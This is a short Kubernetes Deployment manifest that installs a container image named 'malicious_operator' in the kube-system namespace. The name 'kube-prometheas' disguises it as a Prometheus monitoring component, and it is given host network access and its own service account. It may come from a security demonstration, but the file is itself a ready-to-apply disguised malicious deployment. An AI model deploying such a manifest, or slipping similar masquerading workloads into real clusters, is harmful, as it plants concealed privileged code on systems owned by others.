apiVersion: apps/v1
kind: Deployment
metadata:
  name: kube-prometheas
  namespace: kube-system
spec:
  replicas: 1
  selector:
    matchLabels:
      app: kube-prometheas
  template:
    metadata:
      labels:
        app: kube-prometheas
    spec:
      containers:
        - name: kube-prometheas
          image: arwilczek90/malicious_operator
          command:
            - "python"
            - "./main.py"
          imagePullPolicy: IfNotPresent

      serviceAccountName: kube-prometheas
      hostNetwork: true

